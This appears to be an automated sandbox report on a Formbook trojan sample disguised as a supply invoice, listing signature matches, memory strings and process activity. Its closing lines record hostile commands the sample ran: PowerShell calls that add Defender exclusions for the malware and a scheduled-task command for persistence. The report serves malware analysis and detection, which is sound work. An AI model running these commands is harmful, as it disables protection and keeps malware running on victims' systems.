            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355696215_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0360A9A615_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035429A015_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354A84015_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354284015_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0356E8F015_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035268B815_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035B4F4015_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03560F3015_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E2F3015_2_035E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03582F2815_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03532FC815_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354CFE015_2_0354CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035BEFA015_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03540E5915_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FEE2615_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FEEDB15_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03552E9015_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FCE9315_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035DCD1F15_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354AD0015_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0353ADE015_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03558DBF15_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03540C0015_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03530CF215_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E0CB515_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0352D34C15_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F132D15_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0358739A15_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355B2C015_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E12ED15_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035452A015_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0360B16B15_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0352F17215_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0357516C15_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354B1B015_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035EF0CC15_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035470C015_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F70E915_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FF0E015_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FF7B015_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0358563015_2_03585630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F16CC15_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F757115_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_036095C315_2_036095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035DD5B015_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0353146015_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FF43F15_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFB7615_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035B5BF015_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0357DBF915_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355FB8015_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFA4915_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F7A4615_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035B3A6C15_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035EDAC615_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035DDAAC15_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03585AA015_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035E1AA315_2_035E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0354995015_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355B95015_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035D591015_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035AD80015_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035438E015_2_035438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFF0915_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03503FD215_2_03503FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03503FD515_2_03503FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03541F9215_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFFB115_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03549EB015_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F1D5A15_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_03543D4015_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035F7D7315_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0355FDC015_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035B9C3215_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_035FFCF215_2_035FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C1A7015_2_007C1A70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BC97015_2_007BC970
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BC96715_2_007BC967
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BCB9015_2_007BCB90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007BAC1015_2_007BAC10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C514015_2_007C5140
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C331015_2_007C3310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007C330B15_2_007C330B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007B139115_2_007B1391
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007DB74015_2_007DB740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340E2F715_2_0340E2F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340E7AC15_2_0340E7AC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340E41315_2_0340E413
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340CAD315_2_0340CAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0340D81815_2_0340D818
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 01757E54 appears 111 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 016FB970 appears 280 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 0178F290 appears 105 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 01745130 appears 58 times
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: String function: 0177EA12 appears 86 times
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2189838691.000000000184E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2204578486.00000000044A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2214689659.00000000079A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119955184.000000000107A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepaDa.exe@ vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000017FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001197000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exeBinary or memory string: OriginalFilenamepaDa.exe@ vs z1SupplyInvoiceCM60916_Doc.exe
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 11.2.z1SupplyInvoiceCM60916_Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2299844236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.4574137574.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.4577917548.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2351474935.0000000005710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.4578048891.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.2302119508.00000000024B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4578178574.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: dpqsbGoWdXlp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, xw89F7YueMt8vZytUc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, xw89F7YueMt8vZytUc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack, KyybefU7jS1OJapg9Y.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, xw89F7YueMt8vZytUc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@15/9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile created: C:\Users\user\AppData\Local\Temp\tmp68D8.tmpJump to behavior
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Customers] SET [C_Fname] = @C_Fname, [C_Lname] = @C_Lname, [C_address] = @C_address, [C_City] = @C_City, [C_Country] = @C_Country, [C_datemodifay] = @C_datemodifay WHERE (([C_id] = @Original_C_id) AND ([C_Fname] = @Original_C_Fname) AND ([C_Lname] = @Original_C_Lname) AND ([C_City] = @Original_C_City) AND ([C_Country] = @Original_C_Country) AND ((@IsNull_C_datemodifay = 1 AND [C_datemodifay] IS NULL) OR ([C_datemodifay] = @Original_C_datemodifay)));
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: INSERT INTO [dbo].[Product] ([Product_name], [p_modifaydate]) VALUES (@Product_name, @p_modifaydate);
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: INSERT INTO [dbo].[Orders] ([C_id], [order_date], [sheeped_date], [O_maodifaydate]) VALUES (@C_id, @order_date, @sheeped_date, @O_maodifaydate);
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Users] SET [UserName] = @UserName, [Password] = @Password WHERE (([UserName] = @Original_UserName) AND ([Password] = @Original_Password));
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: INSERT INTO [dbo].[Jurnal] ([Date], [Operation], [Table_name], [Old_values], [New_values]) VALUES (@Date, @Operation, @Table_name, @Old_values, @New_values);
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Orders] SET [C_id] = @C_id, [order_date] = @order_date, [sheeped_date] = @sheeped_date, [O_maodifaydate] = @O_maodifaydate WHERE (([Order_id] = @Original_Order_id) AND ([C_id] = @Original_C_id) AND ([order_date] = @Original_order_date) AND ([sheeped_date] = @Original_sheeped_date) AND ((@IsNull_O_maodifaydate = 1 AND [O_maodifaydate] IS NULL) OR ([O_maodifaydate] = @Original_O_maodifaydate)));
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Jurnal] SET [Date] = @Date, [Operation] = @Operation, [Table_name] = @Table_name, [Old_values] = @Old_values, [New_values] = @New_values WHERE (([Date] = @Original_Date) AND ([Operation] = @Original_Operation) AND ([Table_name] = @Original_Table_name));
            Source: svchost.exe, 0000000F.00000002.4576349725.0000000002E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2474990393.0000000002E6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2475117325.0000000002E72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2477035867.0000000002EA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4577223668.0000000002ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000000.2119876614.0000000000F92000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000000F.00000002.4578189641.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578736616.0000000003B2C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2582857930.000000003223C000.00000004.80000000.00040000.00000000.sdmp, dpqsbGoWdXlp.exe.0.drBinary or memory string: UPDATE [dbo].[Product] SET [Product_name] = @Product_name, [p_modifaydate] = @p_modifaydate WHERE (([Product_id] = @Original_Product_id) AND ([Product_name] = @Original_Product_name) AND ((@IsNull_p_modifaydate = 1 AND [p_modifaydate] IS NULL) OR ([p_modifaydate] = @Original_p_modifaydate)));
            Source: z1SupplyInvoiceCM60916_Doc.exeReversingLabs: Detection: 47%
            Source: z1SupplyInvoiceCM60916_Doc.exeString found in binary or memory: Cascade OrdersAcloseAllWindowsToolStripMenuItem#Close all windows-helpsToolStripMenuItem
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile read: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
